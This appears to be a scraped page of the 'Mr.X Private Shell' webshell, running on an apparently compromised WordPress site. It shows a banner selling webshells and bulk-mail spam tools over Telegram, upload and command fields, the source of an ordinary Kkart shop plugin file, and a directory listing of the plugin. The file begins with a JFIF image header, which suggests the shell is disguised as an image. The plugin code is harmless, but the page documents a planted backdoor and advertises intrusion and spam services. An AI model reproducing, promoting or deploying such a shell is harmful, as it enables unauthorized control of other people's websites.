����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

antiaginglove@216.73.216.231: ~ $
<?php

//////////////////////////////////////////////////////////////
//===========================================================
// body-props-settings.php
//===========================================================
// KKART
// Inspired by the DESIRE to be the BEST OF ALL
// ----------------------------------------------------------
// Started by: Pulkit Gupta
// Date:       23rd Jan 2017
// Time:       23:00 hrs
// Site:       http://kkart.com/wordpress (KKART)
// ----------------------------------------------------------
// Please Read the Terms of use at http://kkart.com/tos
// ----------------------------------------------------------
//===========================================================
// (c)Kkart Team
//===========================================================
//////////////////////////////////////////////////////////////

// Are we being accessed directly ?
if(!defined('KKART_VERSION')) {
	exit('Hacking Attempt !');
}

// Set body property atts
function kkart_do_shortcode_el_filter($el){
	global $post, $product;
	
	if(empty($product)){
		return $el;
	}
	
	$sale_price_dates_from_timestamp = $product->get_date_on_sale_from( 'edit' ) ? $product->get_date_on_sale_from( 'edit' )->getOffsetTimestamp() : false;
	$sale_price_dates_to_timestamp = $product->get_date_on_sale_to( 'edit' ) ? $product->get_date_on_sale_to( 'edit' )->getOffsetTimestamp() : false;

	$sale_price_dates_from = $sale_price_dates_from_timestamp ? date_i18n( 'Y-m-d', $sale_price_dates_from_timestamp ) : '';
	$sale_price_dates_to   = $sale_price_dates_to_timestamp ? date_i18n( 'Y-m-d', $sale_price_dates_to_timestamp ) : '';
	$downloads = (array) $product->get_downloads();
	$_downloads = array();
	
	// Covert downloads array for shortcode compatibility
	foreach($downloads as $kk => $vv){
		$_downloads['names'][] = $vv['name'];
		$_downloads['hashes'][] = $vv['id'];
		$_downloads['urls'][] = $vv['file'];
	}
	
	$props = array(
		'_regular_price' => $product->get_regular_price('edit'),
		'_sale_price' => $product->get_sale_price('edit'),
		'product_image_gallery' =>  $product->get_gallery_image_ids(),
		'_sale_price_dates_from' =>  esc_attr( $sale_price_dates_from ),
		'_sale_price_dates_to' =>  esc_attr( $sale_price_dates_to ),
		'_downloadable_files' => $_downloads
	);
	
	foreach($props as $prop => $val){
		$el['atts'][$prop] = $val;
		$el['oAtts'][$prop] = $val;
	}
	
	return $el;
}

// Set body property for the KKART product
function kkart_body_props_settings($params){
	global $post;
	
	$product = kkart_get_product($post);
	
	$params['kkart_gallery'] = array(
		'product_image_gallery' => array(
			'type' => 'multi_image',
			'label' => __pl('product_gallery'),
			'default' => ((!empty($product)) ? implode(',', $product->get_gallery_image_ids()) : ''),
			'export-def' => 1,
			'post' => 1,
		),
	);
	
	$params['kkart_pricing'] = array(
		'_downloadable' => array(
			'type' => 'checkbox',
			'label' => __pl('Is Downloadable'),
			'post' => 1,
		),
		'_regular_price' => array(
			'type' => 'spinner',
			'label' => __pl('Regular Price').'('.get_kkart_currency_symbol().')',
			'min' => 0,
			'post' => 1,
		),
		'_sale_price' => array(
			'type' => 'spinner',
			'label' => __pl('Sale Price').'('.get_kkart_currency_symbol().')',
			'min' => 0,
			'post' => 1,
		),
		'sale_time' => array(
			'type' => 'checkbox',
			'label' => __pl('Sale Schedule'),
		),
		'_sale_price_dates_from' => array(
			'type' => 'datetime',
			'label' => __pl('Sale Start Time'),
			'req' => ['sale_time' => 'true'],
			'post' => 1,
		),
		'_sale_price_dates_to' => array(
			'type' => 'datetime',
			'label' => __pl('Sale End Time'),
			'req' => ['sale_time' => 'true'],
			'post' => 1,
		),
		'_downloadable_files' => array(
			'type' => 'downloadable_files',
			'label' => __pl('Downloadable Files'),
			'req' => ['_downloadable' => 'true'],
		),
		'_download_limit' => array(
			'type' => 'text',
			'label' => __pl('Download Limit'),
			'req' => ['_downloadable' => 'true'],
			'desc' => __pl('Leave blank for unlimited re-downloads.'),
		),
		'_download_expiry' => array(
			'type' => 'text',
			'label' => __pl('Download Expiry'),
			'req' => ['_downloadable' => 'true'],
			'desc' => __pl('Enter the number of days before a download link expires, or leave blank.'),
		),
		'_tax_status' => array(
			'type' => 'select',
			'label' => __pl('Tax Status'),
			'list' => array(
				'taxable' => __pl('Taxable'),
				'shipping' => __pl('Shipping Only'),
				'none' => __pl('None'),
			),
			'default' => 'taxable',
			'post' => 1,
		),
		'_tax_class' => array(
			'type' => 'select',
			'label' => __pl('Tax Class'),
			'list' => kkart_get_product_tax_class_options(),
			'default' => 'standard',
			'post' => 1,
		),
	);
	
	$params['kkart_inventory'] = array(
		'_sku' => array(
			'type' => 'text',
			'label' => __pl('SKU (Stock Keeping Unit)'),
			'post' => 1,
		),
		'barcode' => array(
			'type' => 'text',
			'label' => __pl('Barcode (ISBN, UPC, GTIN, etc.)'),
		),
		'_manage_stock' => array(
			'type' => 'checkbox',
			'label' => __pl('Track quantity'),
			'post' => 1,
		),
		'_stock' => array(
			'type' => 'spinner',
			'label' => __pl('Stock quantity'),
			'default' => 1,
			'post' => 1,
			'req' => ['_manage_stock' => 'true'],
		),
		'_backorders' => array(
			'type' => 'select',
			'label' => __pl('Allow backorders?'),
			'post' => 1,
			'list' => array(
				'no' => __pl('Do not allow'),
				'notify' => __pl('Allow, but notify customer'),
				'yes' => __pl('Allow'),
			),
			'req' => ['_manage_stock' => 'true']
		),
		'_low_stock_amount' => array(
			'type' => 'spinner',
			'label' => __pl('Low stock threshold'),
			'default' => 2,
			'post' => 1,
			'req' => ['_manage_stock' => 'true']
		),
		'_stock_status' => array(
			'type' => 'select',
			'label' => __pl('Stock status'),
			'post' => 1,
			'default' => 'instock',
			'list' => array(
				'instock' => __pl('In stock'),
				'outofstock' => __pl('Out Of Stock'),
				'onbackorder' => __pl('On Backorder'),
			),
			'req' => ['_manage_stock' => '']
		),
		'_sold_individually' => array(
			'type' => 'checkbox',
			'label' => __pl('Sold individually'),
			'post' => 1,
		),
	 );
	 
	 $params['kkart_shipping'] = array(
		'_virtual' => array(
			'type' => 'checkbox',
			'label' => __pl('Is Virtual'),
			'post' => 1,	
		),
		'_weight' => array(
			'type' => 'text',
			'label' => __pl('Weight'),
			'post' => 1,
			'req' => ['_virtual' => ''],
		),
		'_length' => array(
			'type' => 'text',
			'label' => __pl('Length'),
			'post' => 1,
			'req' => ['_virtual' => ''],
		),
		'_width' => array(
			'type' => 'text',
			'label' => __pl('Width'),
			'post' => 1,
			'req' => ['_virtual' => ''],
		),
		'_height' => array(
			'type' => 'text',
			'label' => __pl('Height'),
			'post' => 1,
			'req' => ['_virtual' => ''],
		),
	 );
	 
	 $params['kkart_variants'] = array(// TODO: Complite
		'is_variants' => array(
			'type' => 'checkbox',
			'label' => __pl('Is Variants'),
		),
		'product_variants' => array(
			'type' => 'variable_porduct',
			'label' => __pl('Variants'),
		),
	 );
	 
	 $params['kkart_linkedprod'] = array(// TODO: fix
		'upsell' => array(
			'type' => 'text',
			'label' => __pl('Upsell'),
			'post' => 1,
		),
		'cross_sell' => array(
			'type' => 'text',
			'label' => __pl('Cross Sell'),
			'post' => 1,
		),
	 );
	 
	 $params['kkart_advanced'] = array(
		'_purchase_note' => array(
			'type' => 'textarea',
			'label' => __pl('Purchase Note'),
			'post' => 1,
		),
		'menu_order' => array( // TODO: fix
			'type' => 'spinner',
			'label' => __pl('Menu Order'),
			'post' => 1,
		),
		'comment_status' => array(
			'type' => 'checkbox',
			'label' => __pl('Enable Reviews'),
			'post' => 1,
		),
	 );
	 
	 $params['settings']['kkart_gallery'] = __pl('Product Gallery');
	 $params['settings']['kkart_pricing'] = __pl('Product pricing');
	 $params['settings']['kkart_inventory'] = __pl('Product Inventory');
	 $params['settings']['kkart_shipping'] = __pl('Product Shipping');
	 $params['settings']['kkart_variants'] = __pl('Variants');
	 $params['settings']['kkart_linkedprod'] = __pl('Linked Product');
	 $params['settings']['kkart_advanced'] = __pl('Advanced');
	 $params['post_type_cats']['product'] = array('kkart_gallery', 'kkart_pricing', 'kkart_inventory', 'kkart_shipping', 'kkart_variants', 'kkart_linkedprod', 'kkart_advanced' );
	 
	 return $params;
}

Filemanager

Name Type Size Permission Actions
abstracts Folder 0755
admin Folder 0755
cli Folder 0755
customizer Folder 0755
data-stores Folder 0755
emails Folder 0755
export Folder 0755
gateways Folder 0755
import Folder 0755
integrations Folder 0755
interfaces Folder 0755
legacy Folder 0755
libraries Folder 0755
log-handlers Folder 0755
payment-tokens Folder 0755
queue Folder 0755
rest-api Folder 0755
shipping Folder 0755
shortcodes Folder 0755
theme-support Folder 0755
tracks Folder 0755
traits Folder 0755
walkers Folder 0755
wccom-site Folder 0755
widgets Folder 0755
body-props-settings.php File 8.18 KB 0644
class-kkart-ajax.php File 128.26 KB 0644
class-kkart-api.php File 4.97 KB 0644
class-kkart-auth.php File 11.66 KB 0644
class-kkart-autoloader.php File 2.78 KB 0644
class-kkart-background-emailer.php File 4.59 KB 0644
class-kkart-background-updater.php File 3.5 KB 0644
class-kkart-breadcrumb.php File 9.46 KB 0644
class-kkart-cache-helper.php File 10.71 KB 0644
class-kkart-cart-fees.php File 3.42 KB 0644
class-kkart-cart-session.php File 14.46 KB 0644
class-kkart-cart-totals.php File 27.72 KB 0644
class-kkart-cart.php File 63.24 KB 0644
class-kkart-checkout.php File 44.59 KB 0644
class-kkart-cli.php File 1.02 KB 0644
class-kkart-comments.php File 12.99 KB 0644
class-kkart-countries.php File 42.21 KB 0644
class-kkart-coupon.php File 32.57 KB 0644
class-kkart-customer-download-log.php File 3.38 KB 0644
class-kkart-customer-download.php File 10.36 KB 0644
class-kkart-customer.php File 27.24 KB 0644
class-kkart-data-exception.php File 1.28 KB 0644
class-kkart-data-store.php File 5.88 KB 0644
class-kkart-datetime.php File 2.2 KB 0644
class-kkart-deprecated-action-hooks.php File 6.54 KB 0644
class-kkart-deprecated-filter-hooks.php File 6.26 KB 0644
class-kkart-discounts.php File 30.96 KB 0644
class-kkart-download-handler.php File 23.37 KB 0644
class-kkart-emails.php File 22.17 KB 0644
class-kkart-embed.php File 4.18 KB 0644
class-kkart-form-handler.php File 43.73 KB 0644
class-kkart-frontend-scripts.php File 26 KB 0644
class-kkart-geo-ip.php File 30.43 KB 0644
class-kkart-geolite-integration.php File 1.99 KB 0644
class-kkart-geolocation.php File 10.34 KB 0644
class-kkart-https.php File 4.29 KB 0644
class-kkart-install.php File 53.84 KB 0644
class-kkart-integrations.php File 1.29 KB 0644
class-kkart-log-levels.php File 2.54 KB 0644
class-kkart-logger.php File 8.21 KB 0644
class-kkart-meta-data.php File 2.18 KB 0644
class-kkart-order-factory.php File 3.14 KB 0644
class-kkart-order-item-coupon.php File 4.02 KB 0644
class-kkart-order-item-fee.php File 8.7 KB 0644
class-kkart-order-item-meta.php File 5.8 KB 0644
class-kkart-order-item-product.php File 13.05 KB 0644
class-kkart-order-item-shipping.php File 7.75 KB 0644
class-kkart-order-item-tax.php File 6.44 KB 0644
class-kkart-order-item.php File 10.69 KB 0644
class-kkart-order-query.php File 2.52 KB 0644
class-kkart-order-refund.php File 4.89 KB 0644
class-kkart-order.php File 61.03 KB 0644
class-kkart-payment-gateways.php File 5.24 KB 0644
class-kkart-payment-tokens.php File 5.91 KB 0644
class-kkart-post-data.php File 17.81 KB 0644
class-kkart-post-types.php File 26.49 KB 0644
class-kkart-privacy-background-process.php File 1.69 KB 0644
class-kkart-privacy-erasers.php File 13.28 KB 0644
class-kkart-privacy-exporters.php File 14.12 KB 0644
class-kkart-privacy.php File 14.86 KB 0644
class-kkart-product-attribute.php File 6.89 KB 0644
class-kkart-product-download.php File 6.01 KB 0644
class-kkart-product-external.php File 4.77 KB 0644
class-kkart-product-factory.php File 3.6 KB 0644
class-kkart-product-grouped.php File 5.19 KB 0644
class-kkart-product-query.php File 2.17 KB 0644
class-kkart-product-simple.php File 1.85 KB 0644
class-kkart-product-variable.php File 21.47 KB 0644
class-kkart-product-variation.php File 17.2 KB 0644
class-kkart-query.php File 30.4 KB 0644
class-kkart-rate-limiter.php File 2.08 KB 0644
class-kkart-regenerate-images-request.php File 8.17 KB 0644
class-kkart-regenerate-images.php File 15.24 KB 0644
class-kkart-register-wp-admin-settings.php File 4.87 KB 0644
class-kkart-rest-authentication.php File 19.35 KB 0644
class-kkart-rest-exception.php File 273 B 0644
class-kkart-session-handler.php File 10.57 KB 0644
class-kkart-shipping-rate.php File 5.26 KB 0644
class-kkart-shipping-zone.php File 13.09 KB 0644
class-kkart-shipping-zones.php File 4.07 KB 0644
class-kkart-shipping.php File 11.33 KB 0644
class-kkart-shortcodes.php File 17.21 KB 0644
class-kkart-structured-data.php File 17.2 KB 0644
class-kkart-tax.php File 35.84 KB 0644
class-kkart-template-loader.php File 18.44 KB 0644
class-kkart-tracker.php File 22.51 KB 0644
class-kkart-validation.php File 5.83 KB 0644
class-kkart-webhook.php File 29.85 KB 0644
class-kkart.php File 31.28 KB 0644
kkart-account-functions.php File 12.69 KB 0644
kkart-attribute-functions.php File 20.59 KB 0644
kkart-cart-functions.php File 17.27 KB 0644
kkart-conditional-functions.php File 11.8 KB 0644
kkart-core-functions.php File 82.04 KB 0644
kkart-coupon-functions.php File 2.65 KB 0644
kkart-formatting-functions.php File 41.61 KB 0644
kkart-notice-functions.php File 7.44 KB 0644
kkart-order-functions.php File 33.53 KB 0644
kkart-order-item-functions.php File 5.06 KB 0644
kkart-page-functions.php File 6.92 KB 0644
kkart-product-functions.php File 47.3 KB 0644
kkart-rest-functions.php File 10.62 KB 0644
kkart-stock-functions.php File 12.45 KB 0644
kkart-template-functions.php File 164.64 KB 0644
kkart-template-hooks.php File 11.06 KB 0644
kkart-term-functions.php File 19.45 KB 0644
kkart-update-functions.php File 64.88 KB 0644
kkart-user-functions.php File 26.58 KB 0644
kkart-webhook-functions.php File 5.58 KB 0644
kkart-widget-functions.php File 2.08 KB 0644
premium.php File 943 B 0644
premium_functions.php File 957 B 0644
shortcode_functions.php File 71.11 KB 0644
shortcodes.php File 265.74 KB 0644
template.php File 2.85 KB 0644